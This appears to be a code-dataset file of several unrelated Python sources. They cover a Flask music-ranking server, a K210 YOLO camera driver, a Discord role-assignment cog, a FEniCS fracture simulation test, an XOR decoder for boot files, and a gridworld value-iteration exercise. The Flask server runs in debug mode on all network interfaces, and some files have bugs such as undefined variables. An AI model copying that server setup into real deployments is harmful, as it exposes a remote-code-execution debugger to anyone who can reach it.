methods=['GET'])\r\ndef get_songs():\r\n\tsongs = get_current_songs()\r\n\treturn jsonify(songs)\r\n\r\n@app.route('/new_songs', methods=['GET'])\r\ndef new_songs():\r\n\tsongs = get_new_pair()\r\n\treturn jsonify(songs)\r\n\r\n@app.route('/song/<path:filename>', methods=['GET'])\r\ndef play_song(filename):\r\n\treturn send_from_directory('../../../../Master', unicodedata.normalize('NFC', filename))\r\n\r\n@app.route('/song/<path:filename>/art', methods=['GET'])\r\ndef get_art(filename):\r\n\tart = get_album_art('/' + filename)\r\n\tif art == None:\r\n\t\treturn send_file(\"./unknown.jpg\")\r\n\treturn art\r\n\r\n@app.route('/song/<path:filename>/plays', methods=['POST'])\r\ndef record_play(filename):\r\n\treturn jsonify(update_plays('/' + filename))\r\n\r\n@app.route('/song/<path:filename>/replaygain', methods=['GET'])\r\ndef replaygain(filename):\r\n\treturn jsonify({'replaygain': get_replaygain('../../../../Master/' + unicodedata.normalize('NFC', filename))})\r\n\r\n@app.route('/elo', methods=['POST'])\r\ndef elo():\r\n\tdiff = adjust_elo(request.get_json().get('a'), request.get_json().get('b'), request.get_json().get('result'))\r\n\treturn jsonify({'result': diff})\r\n\r\n@app.route('/queue', methods=['GET', 'POST', 'DELETE'])\r\ndef queue():\r\n\t# print_data(request.args.keys())\r\n\t# print(request.args.keys())\r\n\tif request.method == 'GET':\r\n\t\tprint('get')\r\n\t\treturn jsonify(get_from_queue())\r\n\telif request.method == 'POST':\r\n\t\treturn jsonify(add_to_queue(request.get_json().get('song')))\r\n\telif request.method == 'DELETE':\r\n\t\tapp.logger.error('delete')\r\n\t\tprint('delete')\r\n\t\treturn jsonify(clear_queue())\r\n\t\t\r\n@app.route('/queue/<index>', methods=['DELETE'])\r\ndef remove_song(index):\r\n\tif request.method == 'DELETE':\r\n\t\treturn jsonify(remove_from_queue(int(index)))\r\n\r\n@app.route('/stats', methods=['GET'])\r\ndef get_stats():\r\n\treturn jsonify(get_songs_stats())\r\n\r\n@app.route('/top', methods=['GET'])\r\ndef get_top():\r\n\tn = 10\r\n\tif request.args.get('n'):\r\n\t\tn = int(request.args.get('n'))\r\n\treturn jsonify(get_top_songs(n))\r\n\r\n@app.route('/worst', methods=['GET'])\r\ndef get_worst():\r\n\tn = 10\r\n\tif request.args.get('n'):\r\n\t\tn = int(request.args.get('n'))\r\n\treturn jsonify(get_top_songs(n, False))\r\n\r\n@app.route('/most_played', methods=['GET'])\r\ndef most_played():\r\n\tn = 10\r\n\tif request.args.get('n'):\r\n\t\tn = int(request.args.get('n'))\r\n\treturn jsonify(get_most_played_songs(n))\r\n\r\n@app.route('/song/<path:filename>/rank', methods=['GET'])\r\ndef get_rank(filename):\r\n\treturn jsonify(get_song_rank(filename))\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\tapp.run(host='0.0.0.0', port=3333, debug=True)","sub_path":"backend/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"549964293","text":"\nfrom ui_canvas import ui\nimport camera\nimport KPU as kpu\n\n# classify20\n\nanchor = (1.889, 2.5245, 2.9465, 3.94056, 3.99987, 5.3658, 5.155437, 6.92275, 6.718375, 9.01025)\nclasses = ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']\n\nclass HowMany():\n\n    is_load = False\n\n    task, things = None, None\n\n    def load():\n        if HowMany.is_load == False:\n            #print(HowMany.load)\n            HowMany.task = kpu.load(0x5C0000)\n            #task = kpu.load(\"/sd/0x5C0000_20class.kmodel\")\n            kpu.init_yolo2(HowMany.task, 0.5, 0.3, 5, 
(1.889, 2.5245, 2.9465, 3.94056, 3.99987, 5.3658, 5.155437, 6.92275, 6.718375, 9.01025))\n HowMany.is_load = True\n\n def work(img):\n\n HowMany.things = kpu.run_yolo2(HowMany.task, img)\n if HowMany.things:\n\n for pos in range(len(HowMany.things)):\n i = HowMany.things[pos]\n img.draw_rectangle(320 - (i.x() + i.w()), i.y(), i.w(), i.h())\n img.draw_string(320 - (i.x() + i.w()), i.y(), '%.2f:%s' % (i.value(), classes[i.classid()]), color=(0, 255, 0))\n\n return img\n\n def free():\n #print(HowMany.free)\n try:\n if HowMany.is_load:\n kpu.deinit(HowMany.task)\n HowMany.is_load = False\n except Exception as e:\n print(e) # see py_kpu_deinit error will mp_raise_TypeError\n\nclass MaybeIs():\n\n is_load = False\n task, things, result = None, None, None\n\n def load():\n if MaybeIs.is_load == False:\n #print(MaybeIs.load)\n MaybeIs.task = kpu.load(0x5C0000)\n #task = kpu.load(\"/sd/0x5C0000_20class.kmodel\")\n kpu.init_yolo2(MaybeIs.task, 0.5, 0.3, 5, (1.889, 2.5245, 2.9465, 3.94056, 3.99987, 5.3658, 5.155437, 6.92275, 6.718375, 9.01025))\n MaybeIs.is_load = True\n\n def work(img):\n\n MaybeIs.things = kpu.run_yolo2(MaybeIs.task, img)\n if MaybeIs.things:\n\n value, obj = 0, None\n for k in range(len(MaybeIs.things)):\n if value < MaybeIs.things[k].value():\n value, obj = MaybeIs.things[k].value(), MaybeIs.things[k]\n\n i = MaybeIs.things[k]\n MaybeIs.result = classes[i.classid()]\n img.draw_rectangle(320 - (i.x() + i.w()), i.y(), i.w(), i.h())\n img.draw_string(320 - (i.x() + i.w()), i.y(), '%.2f:%s' % (i.value(), classes[i.classid()]), color=(0, 255, 0))\n\n return img\n\n def free():\n #print(MaybeIs.free)\n try:\n if MaybeIs.is_load:\n kpu.deinit(MaybeIs.task)\n MaybeIs.is_load = False\n except Exception as e:\n print(e) # see py_kpu_deinit error will mp_raise_TypeError\n\n\nif __name__ == \"__main__\":\n\n ui.height, ui.weight = 480, 320\n def test_ai_camera():\n\n @ui.warp_template(ui.blank_draw)\n def howmany():\n tmp = camera.obj.get_image()\n HowMany.work(tmp)\n ui.canvas.draw_image(tmp, 0, 0)\n ui.display()\n\n @ui.warp_template(ui.blank_draw)\n def maybe():\n tmp = camera.obj.get_image()\n MaybeIs.work(tmp)\n ui.canvas.draw_image(tmp, 0, 0)\n ui.display()\n\n import time\n last = time.ticks_ms()\n while True:\n try:\n HowMany.load()\n while True:\n try:\n print(time.ticks_ms() - last)\n last = time.ticks_ms()\n howmany()\n except Exception as e:\n # gc.collect()\n print(e)\n except KeyboardInterrupt as e:\n HowMany.free()\n #break\n try:\n MaybeIs.load()\n while True:\n try:\n print(time.ticks_ms() - last)\n last = time.ticks_ms()\n maybe()\n except Exception as e:\n # gc.collect()\n print(e)\n except KeyboardInterrupt as e:\n MaybeIs.free()\n #break\n\n test_ai_camera()\n\n","sub_path":"driver/classify20.py","file_name":"classify20.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"73256827","text":"from discord.ext import commands\r\nimport discord\r\nimport json\r\nimport os\r\n\r\n# Requires message intent for role remove\r\n\r\nclass RoleAssign(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.load()\r\n\r\n def save(self):\r\n with open('roleconfig.json', 'w') as fp:\r\n json.dump(self.watchedMessages, fp, indent=4)\r\n\r\n def load(self):\r\n if os.path.exists('roleconfig.json'):\r\n with open('roleconfig.json', 'r') as fp:\r\n self.watchedMessages = json.load(fp)\r\n self.watchedMessages = {int(x):self.watchedMessages[x] for x in self.watchedMessages}\r\n 
else:\r\n self.watchedMessages = {} # structure will be msgid = {emoji1:role1, emoji2:role2}\r\n self.save()\r\n\r\n @commands.command()\r\n async def createAssignMsg(self, ctx, *args):\r\n msg = await ctx.send('React to get the following roles!')\r\n self.watchedMessages[msg.id] = {}\r\n for i in range(1, len(args), 2):\r\n await msg.add_reaction(args[i])\r\n self.watchedMessages[msg.id][args[i]] = int(args[i-1][3:-1])\r\n\r\n await self.editmessage(msg)\r\n self.save()\r\n\r\n async def editmessage(self, msg):\r\n s = 'React to get the following roles!'\r\n for e in self.watchedMessages[msg.id]:\r\n r = discord.utils.get(msg.guild.roles, id = self.watchedMessages[msg.id][e])\r\n s += '\\n{} : {}'.format(e, r.mention)\r\n await msg.edit(content = s)\r\n\r\n\r\n @commands.command()\r\n async def addRole(self, ctx, *args):\r\n msg = await ctx.channel.history().get(author = self.bot.user)\r\n for i in range(1, len(args), 2):\r\n await msg.add_reaction(args[i])\r\n self.watchedMessages[msg.id][args[i]] = int(args[i-1][3:-1])\r\n await self.editmessage(msg)\r\n\r\n @commands.command()\r\n async def removeRole(self, ctx, *args):\r\n msg = await ctx.channel.history().get(author = self.bot.user)\r\n for e in args:\r\n del self.watchedMessages[msg.id][e]\r\n await msg.clear_reaction(e)\r\n await self.editmessage(msg)\r\n\r\n\r\n @commands.Cog.listener()\r\n async def on_raw_reaction_add(self, payload):\r\n if payload.member == self.bot.user:\r\n return\r\n elif payload.message_id in self.watchedMessages:\r\n r = discord.utils.get(payload.member.guild.roles, id = self.watchedMessages[payload.message_id][str(payload.emoji)])\r\n await payload.member.add_roles(r)\r\n\r\n @commands.Cog.listener()\r\n async def on_raw_reaction_remove(self, payload):\r\n if payload.message_id in self.watchedMessages:\r\n g = self.bot.get_guild(payload.guild_id)\r\n m = g.get_member(payload.user_id)\r\n r = discord.utils.get(g.roles, id = self.watchedMessages[payload.message_id][str(payload.emoji)])\r\n await m.remove_roles(r)\r\n","sub_path":"ExampleCogs/RoleAssign.py","file_name":"RoleAssign.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"2308581","text":"# sys.path.append(\"../src/\")\nimport sys\nsys.path.append(\"../src/\")\n# from post_processing import compute_sig, local_project\nimport site\nimport sys\n\nimport pandas as pd\n\nimport sys\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.use('Agg')\n\nimport mshr\nimport dolfin\nfrom dolfin import MPI\nimport os\nimport sympy\nimport numpy as np\n# import post_processing as pp\nimport petsc4py\nfrom functools import reduce\nimport ufl\n\npetsc4py.init(sys.argv)\n\nfrom petsc4py import PETSc\n# from hashlib import md5\nfrom pathlib import Path\nimport json\nimport hashlib\n\nfrom copy import deepcopy\n\nimport mpi4py\n\ncomm = mpi4py.MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = comm.Get_size()\n\nfrom dolfin.cpp.log import log, LogLevel, set_log_level\ndolfin.parameters[\"std_out_all_processes\"] = False\n\nfrom solvers import EquilibriumAM\nfrom solver_stability import StabilitySolver\nfrom linsearch import LineSearch\n\n# from dolfin import NonlinearProblem, derivative, \\\n# TrialFunction, TestFunction, inner, assemble, sqrt, \\\n# Constant, interpolate, RectangleMesh, Point\n\nfrom dolfin import *\nimport yaml\n\nfrom utils import get_versions\ncode_parameters = get_versions()\n\nset_log_level(LogLevel.INFO)\n\n\n\ndef 
getDefaultParameters():\n\n with open('../parameters/form_compiler.yml') as f:\n form_compiler_parameters = yaml.load(f, Loader=yaml.FullLoader)\n with open('../parameters/solvers_default.yml') as f:\n equilibrium_parameters = yaml.load(f, Loader=yaml.FullLoader)['equilibrium']\n with open('../parameters/solvers_default.yml') as f:\n damage_parameters = yaml.load(f, Loader=yaml.FullLoader)['damage']\n with open('../parameters/solvers_default.yml') as f:\n elasticity_parameters = yaml.load(f, Loader=yaml.FullLoader)['elasticity']\n with open('../parameters/model1d.yaml') as f:\n material_parameters = yaml.load(f, Loader=yaml.FullLoader)['material']\n with open('../parameters/loading.yaml') as f:\n loading_parameters = yaml.load(f, Loader=yaml.FullLoader)['loading']\n with open('../parameters/stability.yaml') as f:\n stability_parameters = yaml.load(f, Loader=yaml.FullLoader)['stability']\n with open('../parameters/stability.yaml') as f:\n inertia_parameters = yaml.load(f, Loader=yaml.FullLoader)['inertia']\n with open('../parameters/stability.yaml') as f:\n eigen_parameters = yaml.load(f, Loader=yaml.FullLoader)['eigen']\n\n default_parameters = {\n 'code': {**code_parameters},\n 'compiler': {**form_compiler_parameters},\n 'eigen': {**eigen_parameters},\n # 'geometry': {**geometry_parameters},\n 'inertia': {**inertia_parameters},\n 'loading': {**loading_parameters},\n 'material': {**material_parameters},\n # 'newton': {**newton_parameters},\n 'equilibrium':{**equilibrium_parameters},\n 'damage':{**damage_parameters},\n 'elasticity':{**elasticity_parameters},\n 'stability': {**stability_parameters},\n }\n\n return default_parameters\n \ndef numerical_test(\n user_parameters,\n ell=0.05,\n nu=0.,\n):\n time_data = []\n time_data_pd = []\n spacetime = []\n lmbda_min_prev = 1e-6\n bifurcated = False\n bifurcation_loads = []\n save_current_bifurcation = False\n bifurc_i = 0\n bifurcation_loads = []\n\n # Create mesh and define function space\n geometry_parameters = {'Lx': 1., 'Ly': .1, 'n': 5}\n\n # Define Dirichlet boundaries\n outdir = '../test/output/test_secondorderevo'\n Path(outdir).mkdir(parents=True, exist_ok=True)\n\n\n with open('../parameters/form_compiler.yml') as f:\n form_compiler_parameters = yaml.load(f, Loader=yaml.FullLoader)\n\n with open('../parameters/solvers_default.yml') as f:\n solver_parameters = yaml.load(f, Loader=yaml.FullLoader)\n\n with open('../parameters/model1d.yaml') as f:\n material_parameters = yaml.load(f, Loader=yaml.FullLoader)['material']\n\n with open('../parameters/loading.yaml') as f:\n loading_parameters = yaml.load(f, Loader=yaml.FullLoader)['loading']\n\n with open('../parameters/stability.yaml') as f:\n stability_parameters = yaml.load(f, Loader=yaml.FullLoader)['stability']\n\n Path(outdir).mkdir(parents=True, exist_ok=True)\n\n print('Outdir is: '+outdir)\n\n default_parameters = {\n 'code': {**code_parameters},\n 'compiler': {**form_compiler_parameters},\n 'geometry': {**geometry_parameters},\n 'loading': {**loading_parameters},\n 'material': {**material_parameters},\n 'solver':{**solver_parameters},\n 'stability': {**stability_parameters},\n }\n\n default_parameters.update(user_parameters)\n # FIXME: Not nice\n parameters = default_parameters\n\n with open(os.path.join(outdir, 'parameters.yaml'), \"w\") as f:\n yaml.dump(parameters, f, default_flow_style=False)\n\n Lx = parameters['geometry']['Lx']; Ly = parameters['geometry']['Ly']\n ell = parameters['material']['ell']\n comm = MPI.comm_world\n geom = mshr.Rectangle(dolfin.Point(-Lx/2., 
-Ly/2.), dolfin.Point(Lx/2., Ly/2.))\n # import pdb; pdb.set_trace()\n # resolution = max(geometry_parameters['n'] * Lx / ell, 1/(Ly*10))\n resolution = max(geometry_parameters['n'] * Lx / ell, 5/(Ly*10))\n resolution = 50\n mesh = mshr.generate_mesh(geom, resolution)\n meshf = dolfin.File(os.path.join(outdir, \"mesh.xml\"))\n meshf << mesh\n plot(mesh)\n plt.savefig(os.path.join(outdir, \"mesh.pdf\"), bbox_inches='tight')\n\n savelag = 1\n left = dolfin.CompiledSubDomain(\"near(x[0], -Lx/2.)\", Lx=Lx)\n right = dolfin.CompiledSubDomain(\"near(x[0], Lx/2.)\", Lx=Lx)\n left_bottom_pt = dolfin.CompiledSubDomain(\"near(x[0],-Lx/2.) && near(x[1],-Ly/2.)\", Lx=Lx, Ly=Ly)\n\n mf = dolfin.MeshFunction(\"size_t\", mesh, 1, 0)\n right.mark(mf, 1)\n left.mark(mf, 2)\n\n ds = dolfin.Measure(\"ds\", subdomain_data=mf)\n dx = dolfin.Measure(\"dx\", metadata=form_compiler_parameters, domain=mesh)\n\n # Function Spaces\n V_u = dolfin.VectorFunctionSpace(mesh, \"CG\", 1)\n V_alpha = dolfin.FunctionSpace(mesh, \"CG\", 1)\n u = dolfin.Function(V_u, name=\"Total displacement\")\n alpha = Function(V_alpha)\n dalpha = TrialFunction(V_alpha)\n alpha_bif = dolfin.Function(V_alpha)\n alpha_bif_old = dolfin.Function(V_alpha)\n\n\n state = {'u': u, 'alpha': alpha}\n Z = dolfin.FunctionSpace(mesh, \n dolfin.MixedElement([u.ufl_element(),alpha.ufl_element()]))\n z = dolfin.Function(Z)\n v, beta = dolfin.split(z)\n\n ut = dolfin.Expression(\"t\", t=0.0, degree=0)\n bcs_u = [dolfin.DirichletBC(V_u.sub(0), dolfin.Constant(0), left),\n dolfin.DirichletBC(V_u.sub(0), ut, right),\n dolfin.DirichletBC(V_u, (0, 0), left_bottom_pt, method=\"pointwise\")]\n\n bcs_alpha_l = DirichletBC(V_alpha, Constant(0.0), left)\n bcs_alpha_r = DirichletBC(V_alpha, Constant(0.0), right)\n # bcs_alpha =[bcs_alpha_l, bcs_alpha_r]\n bcs_alpha = []\n\n bcs = {\"damage\": bcs_alpha, \"elastic\": bcs_u}\n\n # import pdb; pdb.set_trace()\n\n ell = parameters['material']['ell']\n\n # Problem definition\n # Problem definition\n k_res = parameters['material']['k_res']\n a = (1 - alpha) ** 2. + k_res\n w_1 = parameters['material']['sigma_D0'] ** 2 / parameters['material']['E']\n w = w_1 * alpha\n eps = sym(grad(u))\n lmbda0 = parameters['material']['E'] * parameters['material']['nu'] /(1. - parameters['material']['nu'])**2.\n mu0 = parameters['material']['E']/ 2. / (1.0 + parameters['material']['nu'])\n Wu = 1./2.* lmbda0 * tr(eps)**2. 
+ mu0 * inner(eps, eps)\n\n energy = a * Wu * dx + w_1 *( alpha + \\\n parameters['material']['ell']** 2.*inner(grad(alpha), grad(alpha)))*dx\n\n eps_ = variable(eps)\n sigma = diff(a * Wu, eps_)\n e1 = dolfin.Constant([1, 0])\n\n file_out = dolfin.XDMFFile(os.path.join(outdir, \"output.xdmf\"))\n file_out.parameters[\"functions_share_mesh\"] = True\n file_out.parameters[\"flush_output\"] = True\n file_postproc = dolfin.XDMFFile(os.path.join(outdir, \"output_postproc.xdmf\"))\n file_postproc.parameters[\"functions_share_mesh\"] = True\n file_postproc.parameters[\"flush_output\"] = True\n file_eig = dolfin.XDMFFile(os.path.join(outdir, \"modes.xdmf\"))\n file_eig.parameters[\"functions_share_mesh\"] = True\n file_eig.parameters[\"flush_output\"] = True\n file_bif = dolfin.XDMFFile(os.path.join(outdir, \"bifurcation.xdmf\"))\n file_bif.parameters[\"functions_share_mesh\"] = True\n file_bif.parameters[\"flush_output\"] = True\n file_bif_postproc = dolfin.XDMFFile(os.path.join(outdir, \"bifurcation_postproc.xdmf\"))\n file_bif_postproc.parameters[\"functions_share_mesh\"] = True\n file_bif_postproc.parameters[\"flush_output\"] = True\n\n\n solver = EquilibriumAM(energy, state, bcs, parameters=parameters['solver'])\n stability = StabilitySolver(energy, state, bcs, parameters = parameters['stability'])\n linesearch = LineSearch(energy, state)\n\n xs = np.linspace(-parameters['geometry']['Lx']/2., parameters['geometry']['Lx']/2, 50)\n\n load_steps = np.linspace(parameters['loading']['load_min'],\n parameters['loading']['load_max'],\n parameters['loading']['n_steps'])\n log(LogLevel.INFO, '====================== EVO ==========================')\n log(LogLevel.INFO, '{}'.format(parameters))\n\n for it, load in enumerate(load_steps):\n log(LogLevel.CRITICAL, '====================== STEPPING ==========================')\n log(LogLevel.CRITICAL, 'CRITICAL: Solving load t = {:.2f}'.format(load))\n ut.t = load\n (time_data_i, am_iter) = solver.solve()\n\n # Second order stability conditions\n\n (stable, negev) = stability.solve(solver.damage.problem.lb)\n log(LogLevel.CRITICAL, 'Current state is{}stable'.format(' ' if stable else ' un'))\n\n # we postpone the update after the stability check\n solver.update()\n\n mineig = stability.mineig if hasattr(stability, 'mineig') else 0.0\n log(LogLevel.INFO, 'INFO: lmbda min {}'.format(lmbda_min_prev))\n log(LogLevel.INFO, 'INFO: mineig {}'.format(mineig))\n Deltav = (mineig-lmbda_min_prev) if hasattr(stability, 'eigs') else 0\n\n if (mineig + Deltav)*(lmbda_min_prev+dolfin.DOLFIN_EPS) < 0 and not bifurcated:\n bifurcated = True\n\n # save 3 bif modes\n print('About to bifurcate load ', load, 'step', it)\n bifurcation_loads.append(load)\n modes = np.where(stability.eigs < 0)[0]\n\n with dolfin.XDMFFile(os.path.join(outdir, \"postproc.xdmf\")) as file:\n leneigs = len(modes)\n maxmodes = min(3, leneigs)\n for n in range(maxmodes):\n mode = dolfin.project(stability.linsearch[n]['beta_n'], V_alpha)\n modename = 'beta-%d'%n\n print(modename)\n file.write_checkpoint(mode, modename, 0, append=True)\n\n bifurc_i += 1\n\n lmbda_min_prev = mineig if hasattr(stability, 'mineig') else 0.\n\n time_data_i[\"load\"] = load\n time_data_i[\"alpha_max\"] = max(alpha.vector()[:])\n time_data_i[\"elastic_energy\"] = dolfin.assemble(\n 1./2.* material_parameters['E']*a*eps**2. *dx)\n time_data_i[\"dissipated_energy\"] = dolfin.assemble(\n (w + w_1 * material_parameters['ell'] ** 2. 
* inner(grad(alpha), grad(alpha)))*dx)\n time_data_i[\"stable\"] = stability.stable\n time_data_i[\"# neg ev\"] = stability.negev\n time_data_i[\"eigs\"] = stability.eigs if hasattr(stability, 'eigs') else np.inf\n\n snn = dolfin.dot(dolfin.dot(sigma, e1), e1)\n time_data_i[\"sigma\"] = 1/parameters['geometry']['Ly'] * dolfin.assemble(snn*ds(1))\n\n log(LogLevel.INFO,\n \"Load/time step {:.4g}: iteration: {:3d}, err_alpha={:.4g}\".format(\n time_data_i[\"load\"],\n time_data_i[\"iterations\"][0],\n time_data_i[\"alpha_error\"][0]))\n\n time_data.append(time_data_i)\n time_data_pd = pd.DataFrame(time_data)\n\n if np.mod(it, savelag) == 0:\n with file_out as f:\n f.write(alpha, load)\n f.write(u, load)\n with dolfin.XDMFFile(os.path.join(outdir, \"output_postproc.xdmf\")) as f:\n f.write_checkpoint(alpha, \"alpha-{}\".format(it), 0, append = True)\n log(LogLevel.PROGRESS, 'PROGRESS: written step {}'.format(it))\n\n time_data_pd.to_json(os.path.join(outdir, \"time_data.json\"))\n\n spacetime.append(get_trace(alpha))\n\n\n if save_current_bifurcation:\n # modes = np.where(stability.eigs < 0)[0]\n\n time_data_i['h_opt'] = h_opt\n time_data_i['max_h'] = hmax\n time_data_i['min_h'] = hmin\n\n with file_bif_postproc as file:\n # leneigs = len(modes)\n # maxmodes = min(3, leneigs)\n beta0v = dolfin.project(stability.perturbation_beta, V_alpha)\n log(LogLevel.DEBUG, 'DEBUG: irrev {}'.format(alpha.vector()-alpha_old.vector()))\n file.write_checkpoint(beta0v, 'beta0', 0, append = True)\n file.write_checkpoint(alpha_bif_old, 'alpha-old', 0, append=True)\n file.write_checkpoint(alpha_bif, 'alpha-bif', 0, append=True)\n file.write_checkpoint(alpha, 'alpha', 0, append=True)\n\n np.save(os.path.join(outdir, 'energy_perturbations'), energy_perturbations, allow_pickle=True, fix_imports=True)\n\n with file_eig as file:\n _v = dolfin.project(dolfin.Constant(h_opt)*perturbation_v, V_u)\n _beta = dolfin.project(dolfin.Constant(h_opt)*perturbation_beta, V_alpha)\n _v.rename('perturbation displacement', 'perturbation displacement')\n _beta.rename('perturbation damage', 'perturbation damage')\n # import pdb; pdb.set_trace()\n f.write(_v, load)\n f.write(_beta, load)\n\n _spacetime = pd.DataFrame(spacetime)\n spacetime = _spacetime.fillna(0)\n mat = np.matrix(spacetime)\n plt.imshow(mat, cmap = 'Greys', vmin = 0., vmax = 1., aspect=.1)\n plt.colorbar()\n\n def format_space(x, pos, xresol = 100):\n return '$%1.1f$'%((-x+xresol/2)/xresol)\n\n def format_time(t, pos, xresol = 100):\n return '$%1.1f$'%((t-parameters['loading']['load_min'])/parameters['loading']['n_steps']*parameters['loading']['load_max'])\n\n from matplotlib.ticker import FuncFormatter, MaxNLocator\n\n ax = plt.gca()\n\n ax.yaxis.set_major_formatter(FuncFormatter(format_space))\n ax.xaxis.set_major_formatter(FuncFormatter(format_time))\n\n plt.xlabel('$x$')\n plt.ylabel('$t$')\n plt.savefig(os.path.join(outdir, \"spacetime.pdf\".format(load)), bbox_inches=\"tight\")\n\n spacetime.to_json(os.path.join(outdir + \"/spacetime.json\"))\n\n from matplotlib.ticker import FuncFormatter, MaxNLocator\n plot(alpha)\n plt.savefig(os.path.join(outdir, 'alpha.pdf'))\n log(LogLevel.INFO, \"Saved figure: {}\".format(os.path.join(outdir, 'alpha.pdf')))\n\n\n xs = np.linspace(-Lx/2., Lx/2., 100)\n profile = np.array([alpha(x, 0) for x in xs])\n plt.figure()\n plt.plot(xs, profile, marker='o')\n plt.plot(xs, np.array([u(x, 0) for x in xs]))\n # plt.ylim(0., 1.)\n plt.savefig(os.path.join(outdir, 'profile.pdf'))\n\n return time_data_pd, outdir\n\n\nfrom test_firstorderevo 
import get_trace\n# def get_trace(alpha, xresol = 100):\n# X =alpha.function_space().tabulate_dof_coordinates()\n# xs = np.linspace(min(X[:, 0]),max(X[:, 0]), xresol)\n# alpha0 = [alpha(x, 0) for x in xs]\n\n# return alpha0\n\nif __name__ == \"__main__\":\n\n # Parameters\n with open('../parameters/tractionbar.yml') as f:\n parameters = yaml.load(f, Loader=yaml.FullLoader)\n\n data, experiment = numerical_test(user_parameters = parameters)\n print(data)\n\n log(LogLevel.INFO, \"Postprocess\")\n import postprocess as pp\n\n with open(os.path.join(experiment, 'parameters.yaml')) as f:\n parameters = yaml.load(f, Loader=yaml.FullLoader)\n\n lab = '\\\\ell={}, E={}, \\\\sigma_D = {}'.format(\n parameters['material']['ell'],\n parameters['material']['E'],\n parameters['material']['sigma_D0'])\n tc = (parameters['material']['sigma_D0']/parameters['material']['E'])**(.5)\n ell = parameters['material']['ell']\n # import pdb; pdb.set_trace()\n fig1, ax1 =pp.plot_energy(parameters, data, tc)\n # visuals.setspines2()\n print(data['elastic_energy'])\n mu = parameters['material']['E']/2.\n # elast_en = [1./2.*2.*mu*eps**2 for eps in data['load']]\n # Lx = 1.\n # Ly = .1\n # Omega = Lx*Ly\n elast_en = [1./2.*parameters['material']['E']*eps**2 for eps in data['load']]\n plt.plot(data['load'], elast_en, c='k', label='analytic')\n plt.axhline(parameters['geometry']['Ly'], c='k')\n plt.legend()\n\n plt.ylim(0, 1.)\n plt.title('${}$'.format(lab))\n\n fig1.savefig(os.path.join(experiment, \"energy.pdf\"), bbox_inches='tight')\n\n (fig2, ax1, ax2) =pp.plot_spectrum(parameters, data, tc)\n plt.legend(loc='lower left')\n ax2.set_ylim(-1e-7, 2e-4)\n fig2.savefig(os.path.join(experiment, \"spectrum.pdf\"), bbox_inches='tight')\n\n\n","sub_path":"test/test_secondorderevo.py","file_name":"test_secondorderevo.py","file_ext":"py","file_size_in_byte":17200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"448520810","text":"#!/usr/bin/env python\n\n# https://idmdepot.com/Technical_Notes/IBM_Security_Access_Manager_Notes.html\n#\n# Inside grub / isolinux folder: boot.msg and img1a.cfg are the initial\n# syslinux message and the config file, xored with FF.\n\nimport sys\n\nPY3 = sys.version_info[0] == 3\n\ndef process_file(filename):\n data = open(filename, \"rb\").read()\n\n\n if PY3:\n output = \"\".join([chr(x ^ 0xff) for x in data])\n else:\n output = \"\".join([chr(ord(x) ^ 0xff) for x in data])\n\n print(output)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n sys.stderr.write(\"Usage: %s \\n\" % sys.argv[0])\n\n for i in range(1, len(sys.argv)):\n process_file(sys.argv[i])\n","sub_path":"unmask.py","file_name":"unmask.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"433672280","text":"from matplotlib import pyplot as plt\nfrom gridWorld import gridWorld\nfrom copy import deepcopy\nimport numpy as np\n\ndef show_value_function(mdp, V):\n fig = mdp.render(show_state = False, show_reward = False) \n for k in mdp.states():\n s = k if isinstance(k, tuple) else mdp.legal_states[k]\n fig.axes[0].annotate(\"{0:.3f}\".format(V[k]), (s[1] - 0.1, s[0] + 0.1), size = 40/mdp.board_mask.shape[0])\n plt.show(block=False)\n \ndef show_policy(mdp, PI):\n fig = mdp.render(show_state = False, show_reward = False)\n action_map = {\"U\": \"↑\", \"D\": \"↓\", \"L\": \"←\", \"R\": \"→\"}\n for k in mdp.states():\n s = k if isinstance(k, tuple) else mdp.legal_states[k]\n if 
mdp.terminal[s] == 0:\n fig.axes[0].annotate(action_map[PI[k]], (s[1] - 0.1, s[0] + 0.1), size = 100/mdp.board_mask.shape[0])\n plt.show(block=False)\n\n#################### Problem 1: Value Iteration #################### \ndef sum_of_states(mdp, V, state, action):\n return np.sum([mdp.transition_probability(state, action, s)*(mdp.reward(s) + gamma*V[s]) for s in mdp.states()])\ndef value_iteration(mdp, gamma, theta = 1e-3):\n # Make a valuefunction, initialized to 0\n V = np.zeros((len(mdp.states())))\n its = 0\n \"\"\"\n YOUR CODE HERE:\n Problem 1a) Implement Value Iteration\n \n Input arguments:\n - mdp Is the markov decision process, it has some usefull functions given below\n - gamma Is the discount rate\n - theta Is a small threshold for determining accuracy of estimation\n \n Some usefull functions of the grid world mdp:\n - mdp.states() returns a list of all states [0, 1, 2, ...]\n - mdp.actions(state) returns list of actions [\"U\", \"D\", \"L\", \"R\"] if state non-terminal, [] if terminal\n - mdp.transition_probability(s, a, s_next) returns the probability p(s_next | s, a)\n - mdp.reward(state) returns the reward of the state R(s)\n \"\"\"\n max_deltV = 0\n V_old = np.zeros((len(mdp.states())))\n #raise Exception(\"Not implemented\")\n while True:\n delta = 0\n V_old = deepcopy(V)\n for s in mdp.states():\n v = V[s]\n if len(mdp.actions(s))==0:\n V[s] = mdp.reward(s)\n else: \n V[s] = np.max([np.sum([mdp.transition_probability(s, a, s_next)*(mdp.reward(s) + gamma*V[s_next]) for s_next in mdp.states()]) for a in mdp.actions(s)])\n delta = max(delta, abs(v - V[s]))\n if max_deltV < np.linalg.norm(V-V_old, np.inf):\n max_deltV = np.linalg.norm(V-V_old, 